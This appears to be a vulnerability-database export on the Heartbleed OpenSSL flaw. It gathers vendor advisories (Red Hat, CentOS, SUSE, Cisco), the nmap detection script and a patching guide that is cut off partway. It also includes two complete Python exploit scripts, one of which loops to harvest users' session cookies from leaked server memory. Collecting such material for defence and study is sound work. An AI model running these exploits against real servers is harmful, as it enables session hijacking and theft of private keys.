client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n", "modified": "2018-06-06T20:24:06", "published": "2014-04-08T04:00:00", "id": "RHSA-2014:0376", "href": "https://access.redhat.com/errata/RHSA-2014:0376", "type": "redhat", "title": "(RHSA-2014:0376) Important: openssl security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-13T18:46:17", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll users of Red Hat Storage are advised to upgrade to these updated\npackages, which contain a backported patch to correct this issue. For the\nupdate to take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\n", "modified": "2015-04-24T14:20:43", "published": "2014-04-08T04:00:00", "id": "RHSA-2014:0377", "href": "https://access.redhat.com/errata/RHSA-2014:0377", "type": "redhat", "title": "(RHSA-2014:0377) Important: openssl security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-03-14T02:43:51", "edition": 2, "description": "This python script is a modification of the heartbleed proof of concept exploit that looks for cookies, specifically user sessions.", "published": "2014-04-09T00:00:00", "type": "zdt", "title": "Heartbleed User Session Extraction Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22118", "href": "https://0day.today/exploit/description/22118", "sourceData": "#!/usr/bin/python\r\n\r\n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.\r\n# Michael Davis ([email\u00a0protected])\r\n\r\n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n\r\n# The author disclaims copyright to this source code.\r\n\r\nimport select\r\nimport sys\r\nimport string\r\nimport struct\r\nimport socket\r\nimport time\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)')\r\n\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\n\r\nclass HeartBleeder(object):\r\n\r\n server_response = None\r\n socket = None\r\n hostname = ''\r\n port = 443\r\n found_sessions = set()\r\n cookie = 'session'\r\n cookie_length = 56\r\n\r\n def __init__(self, hostname='', cookie=''):\r\n self.hostname = hostname\r\n self.cookie = cookie\r\n\r\n def connect(self):\r\n \"\"\"\r\n Connects to the remote server.\r\n \"\"\"\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sys.stdout.flush()\r\n self.socket.connect((self.hostname, self.port))\r\n sys.stdout.flush()\r\n self.socket.send(hello)\r\n sys.stdout.flush()\r\n\r\n def rcv_response(self):\r\n while True:\r\n _type, version, payload = self.rcv_message()\r\n if _type is None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if _type == 22 and ord(payload[0]) == 0x0E:\r\n break\r\n\r\n def rcv_message(self):\r\n\r\n record_header = self.rcv_all(5)\r\n if record_header is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n _type, version, line = struct.unpack('>BHH', record_header)\r\n payload = self.rcv_all(line, 10)\r\n if payload is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n # print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return _type, version, payload\r\n\r\n def rcv_all(self, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([self.socket], [], [], 5)\r\n if self.socket in r:\r\n data = self.socket.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n\r\n def try_heartbeat(self):\r\n self.socket.send(hb)\r\n while True:\r\n _type, version, self.payload = self.rcv_message()\r\n if _type is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if _type == 24:\r\n # print 'Received heartbeat response:'\r\n self.parse_response()\r\n if len(self.payload) > 3:\r\n pass\r\n # print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if _type == 21:\r\n print 'Received alert:'\r\n self.hexdump(self.payload)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\n def parse_response(self):\r\n \"\"\"\r\n Parses the response from the server for a session id.\r\n \"\"\"\r\n ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)\r\n index = string.find(ascii, self.cookie)\r\n if index >= 0:\r\n info = ascii[index:index + self.cookie_length]\r\n session = info.split(' ')[0]\r\n session = string.replace(session, ';', '')\r\n if session not in self.found_sessions:\r\n self.found_sessions.add(session)\r\n print session\r\n\r\n def hexdump(self, payload):\r\n \"\"\"\r\n Prints out a hexdump in the event that server returns an error.\r\n \"\"\"\r\n for b in xrange(0, len(payload), 16):\r\n line = [c for c in payload[b:b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in line)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\n def scan(self):\r\n self.connect()\r\n self.rcv_response()\r\n self.try_heartbeat()\r\n\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n cookies_str = 'session'\r\n if len(args) > 1:\r\n cookies_str = args[1]\r\n\r\n print cookies_str\r\n\r\n while True:\r\n heartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str)\r\n heartbeat.scan()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22118"}, {"lastseen": "2018-03-03T01:40:21", "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "published": "2014-04-09T00:00:00", "type": "zdt", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22122", "href": "https://0day.today/exploit/description/22122", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n \r\n \r\n#!/usr/bin/env python\r\n \r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n \r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n \r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n \r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n \r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n \r\ndef create_hello(version):\r\n hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n return hello\r\n \r\ndef create_hb(version):\r\n hb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n return hb\r\n \r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n \r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n \r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n \r\ndef hit_hb(s,hb):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n \r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n \r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n \r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n for i in range(len(version)):\r\n print 'Trying ' + version[i][0] + '...'\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(create_hello(version[i][1]))\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n \r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(create_hb(version[i][1]))\r\n if hit_hb(s,create_hb(version[i][1])):\r\n #Stop if vulnerable\r\n break\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22122"}], "suse": [{"lastseen": "2016-09-04T11:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\n\n", "edition": 1, "modified": "2014-04-08T13:04:15", "published": "2014-04-08T13:04:15", "id": "OPENSUSE-SU-2014:0492-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html", "title": "update for openssl (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2019-12-20T18:23:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0160"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0376\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/032287.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0376.html", "edition": 3, "modified": "2014-04-08T02:54:58", "published": "2014-04-08T02:54:58", "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/032287.html", "id": "CESA-2014:0376", "title": "openssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisco": [{"lastseen": "2020-12-24T11:41:41", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "A vulnerability in the Transport Layer Security (TLS)/Datagram Transport Layer Security (DTLS) heartbeat functionality in OpenSSL used in multiple Cisco products could allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server.\n\nThe vulnerability is due to a missing bounds check in the handling of the TLS heartbeat extension. An attacker could exploit this vulnerability by implementing a malicious TLS or DTLS client, if trying to exploit the vulnerability on an affected server, or a malicious TLS or DTLS server, if trying to exploit the vulnerability on an affected client. The attacker could then send a specially-crafted TLS or DTLS heartbeat packet to the connected client or server. An exploit could allow the attacker to disclose a limited portion of memory from a connected client or server for every heartbeat packet sent. The disclosed portions of memory could contain sensitive information that may include private keys and passwords.\n\nMultiple Cisco products incorporate a version of the OpenSSL package affected by a vulnerability that could allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server.\n\nThe vulnerability is due to a missing bounds check in the handling of the Transport Layer Security (TLS) heartbeat extension. An attacker could exploit this vulnerability by implementing a malicious TLS or Datagram Transport Layer Security (DTLS) client, if trying to exploit the vulnerability on an affected server, or a malicious TLS or DTLS server, if trying to exploit the vulnerability on an affected client. An exploit could send a specially crafted TLS or DTLS heartbeat packet to the connected client or server. An exploit could allow the attacker to disclose a limited portion of memory from a connected client or server for every heartbeat packet sent. The disclosed portions of memory could contain sensitive information that may include private keys and passwords.\n\nPlease note that the devices that are affected by this vulnerability are the devices acting as an SSL server terminating SSL connections or devices acting as an SSL Client initiating an SSL connection. Devices that are simply traversed by SSL traffic without terminating it are not affected.\n\nThis advisory will be updated as additional information becomes available. Cisco will release software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities may be available.\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed\"]", "modified": "2014-10-29T16:11:45", "published": "2014-04-09T03:00:00", "id": "CISCO-SA-20140409-HEARTBLEED", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed", "type": "cisco", "title": "OpenSSL Heartbeat Extension Vulnerability in Multiple Cisco Products", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:05:58", "description": "Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)\n\n## Script Arguments \n\n#### ssl-heartbleed.protocols \n\n(default tries all) TLS 1.0, TLS 1.1, or TLS 1.2\n\n#### tls.servername \n\nSee the documentation for the tls library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the mssql library. \n\n#### smtp.domain \n\nSee the documentation for the smtp library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -p 443 --script ssl-heartbleed <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 443/tcp open https\n | ssl-heartbleed:\n | VULNERABLE:\n | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\n | State: VULNERABLE\n | Risk factor: High\n | Description:\n | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n |\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n | http://www.openssl.org/news/secadv_20140407.txt\n |_ http://cvedetails.com/cve/2014-0160/\n \n \n\n## Requires \n\n * match\n * nmap\n * shortport\n * sslcert\n * stdnse\n * string\n * tableaux\n * vulns\n * tls\n\n* * *\n", "edition": 14, "published": "2014-04-09T01:49:29", "title": "ssl-heartbleed NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-11-06T15:07:01", "id": "NMAP:SSL-HEARTBLEED.NSE", "href": "https://nmap.org/nsedoc/scripts/ssl-heartbleed.html", "sourceData": "local match = require('match')\nlocal nmap = require('nmap')\nlocal shortport = require('shortport')\nlocal sslcert = require('sslcert')\nlocal stdnse = require('stdnse')\nlocal string = require \"string\"\nlocal tableaux = require \"tableaux\"\nlocal vulns = require('vulns')\nlocal have_tls, tls = pcall(require,'tls')\nassert(have_tls, \"This script requires the tls.lua library from https://nmap.org/nsedoc/lib/tls.html\")\n\ndescription = [[\nDetects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160).\nThe code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)\n]]\n\n---\n-- @usage\n-- nmap -p 443 --script ssl-heartbleed <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 443/tcp open https\n-- | ssl-heartbleed:\n-- | VULNERABLE:\n-- | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\n-- | State: VULNERABLE\n-- | Risk factor: High\n-- | Description:\n-- | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n-- |\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n-- | http://www.openssl.org/news/secadv_20140407.txt\n-- |_ http://cvedetails.com/cve/2014-0160/\n--\n--\n-- @args ssl-heartbleed.protocols (default tries all) TLS 1.0, TLS 1.1, or TLS 1.2\n--\n\nauthor = \"Patrik Karlsson <patrik@cqure.net>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"vuln\", \"safe\" }\ndependencies = {\"https-redirect\"}\n\nlocal arg_protocols = stdnse.get_script_args(SCRIPT_NAME .. \".protocols\") or {'TLSv1.0', 'TLSv1.1', 'TLSv1.2'}\n\nportrule = function(host, port)\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\nlocal function recvhdr(s)\n local status, hdr = s:receive_buf(match.numbytes(5), true)\n if not status then\n stdnse.debug3('Unexpected EOF receiving record header - server closed connection')\n return\n end\n local typ, ver, ln = string.unpack('>B I2 I2', hdr)\n return status, typ, ver, ln\nend\n\nlocal function recvmsg(s, len)\n local status, pay = s:receive_buf(match.numbytes(len), true)\n if not status then\n stdnse.debug3('Unexpected EOF receiving record payload - server closed connection')\n return\n end\n return true, pay\nend\n\nlocal function testversion(host, port, version)\n\n local hello = tls.client_hello({\n [\"protocol\"] = version,\n -- Claim to support every cipher\n -- Doesn't work with IIS, but IIS isn't vulnerable\n [\"ciphers\"] = tableaux.keys(tls.CIPHERS),\n [\"compressors\"] = {\"NULL\"},\n [\"extensions\"] = {\n -- Claim to support common elliptic curves\n [\"elliptic_curves\"] = tls.EXTENSION_HELPERS[\"elliptic_curves\"](tls.DEFAULT_ELLIPTIC_CURVES),\n [\"heartbeat\"] = \"\\x01\", -- peer_not_allowed_to_send\n },\n })\n\n local payload = \"Nmap ssl-heartbleed\"\n local hb = tls.record_write(\"heartbeat\", version, string.pack(\"B>I2\",\n 1, -- HeartbeatMessageType heartbeat_request\n 0x4000) -- payload length (falsified)\n -- payload length is based on 4096 - 16 bytes padding - 8 bytes packet\n -- header + 1 to overflow\n .. payload -- less than payload length.\n )\n\n local status, s, err\n local specialized = sslcert.getPrepareTLSWithoutReconnect(port)\n if specialized then\n status, s = specialized(host, port)\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", s)\n return\n end\n else\n s = nmap.new_socket()\n status, err = s:connect(host, port)\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", err)\n return\n end\n end\n\n s:set_timeout(5000)\n\n -- Send Client Hello to the target server\n status, err = s:send(hello)\n if not status then\n stdnse.debug1(\"Couldn't send Client Hello: %s\", err)\n s:close()\n return nil\n end\n\n -- Read response\n local done = false\n local supported = false\n local i = 1\n local response\n repeat\n status, response, err = tls.record_buffer(s, response, i)\n if err == \"TIMEOUT\" then\n -- Timed out while waiting for server_hello_done\n -- Could be client certificate required or other message required\n -- Let's just drop out and try sending the heartbeat anyway.\n done = true\n break\n elseif not status then\n stdnse.debug1(\"Couldn't receive: %s\", err)\n s:close()\n return nil\n end\n\n local record\n i, record = tls.record_read(response, i)\n if record == nil then\n stdnse.debug1(\"Unknown response from server\")\n s:close()\n return nil\n elseif record.protocol ~= version then\n stdnse.debug1(\"Protocol version mismatch\")\n s:close()\n return nil\n end\n\n if record.type == \"handshake\" then\n for _, body in ipairs(record.body) do\n if body.type == \"server_hello\" then\n if body.extensions and body.extensions[\"heartbeat\"] == \"\\x01\" then\n supported = true\n end\n elseif body.type == \"server_hello_done\" then\n stdnse.debug1(\"we're done!\")\n done = true\n end\n end\n end\n until done\n if not supported then\n stdnse.debug1(\"Server does not support TLS Heartbeat Requests.\")\n s:close()\n return nil\n end\n\n status, err = s:send(hb)\n if not status then\n stdnse.debug1(\"Couldn't send heartbeat request: %s\", err)\n s:close()\n return nil\n end\n while(true) do\n local status, typ, ver, len = recvhdr(s)\n if not status then\n stdnse.debug1('No heartbeat response received, server likely not vulnerable')\n break\n end\n if typ == 24 then\n local pay\n status, pay = recvmsg(s, 0x0fe9)\n s:close()\n if #pay > 3 then\n return true\n else\n stdnse.debug1('Server processed malformed heartbeat, but did not return any extra data.')\n break\n end\n elseif typ == 21 then\n stdnse.debug1('Server returned error, likely not vulnerable')\n break\n end\n end\n\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\",\n state = vulns.STATE.NOT_VULN,\n risk_factor = \"High\",\n description = [[\nOpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n ]],\n\n references = {\n 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160',\n 'http://www.openssl.org/news/secadv_20140407.txt ',\n 'http://cvedetails.com/cve/2014-0160/'\n }\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n local test_vers = arg_protocols\n\n if type(test_vers) == 'string' then\n test_vers = { test_vers }\n end\n\n for _, ver in ipairs(test_vers) do\n if nil == tls.PROTOCOLS[ver] then\n return \"\\n Unsupported protocol version: \" .. ver\n end\n local status = testversion(host, port, ver)\n if ( status ) then\n vuln_table.state = vulns.STATE.VULN\n break\n end\n end\n\n return report:make_output(vuln_table)\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "vulnerlab": [{"lastseen": "2019-05-29T17:28:54", "description": "", "edition": 4, "published": "2014-04-09T00:00:00", "title": "HeartBleed SSL CVE 20140160 - 10 Steps to Fix in Ubuntu", "type": "vulnerlab", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "VULNERLAB:1254", "href": "http://www.vulnerability-lab.com/get_content.php?id=1254", "sourceData": "Document Title:\r\n===============\r\nHeartBleed SSL CVE 20140160 - 10 Steps to Fix in Ubuntu\r\n\r\n\r\n\r\nRelease Date:\r\n=============\r\n2014-04-09\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1254\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nReport\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nHow to Fix the HeartBleed SSL Vulnerability (CVE-2014-0160) in Ubuntu with 10 easy steps!\r\n\r\n1. First we login via terminal console to the ssh port (22)\r\n2. Now, we use sudo or su to auth to work with root privileges\r\n3. After the privileges upgrade to root we type `apt-get update` to update all installed core packages\r\n4. Next command is `apt-get upgrade` to upgrade the already installed linux software packages\r\n5. Now, we reboot the system with the following basic command `sudo reboot`\r\n6. After the startup we access the server again via ssh client to port 22\r\n7. We install the development package and upgrade the library itself via the following terminal command `sudo apt-get install openssl libssl-dev`\r\n7. As next command we type in the command line `openssl version` (1.0.1) to review the newst installed version and package name\r\n9. The following 2 commands shows all affected services that 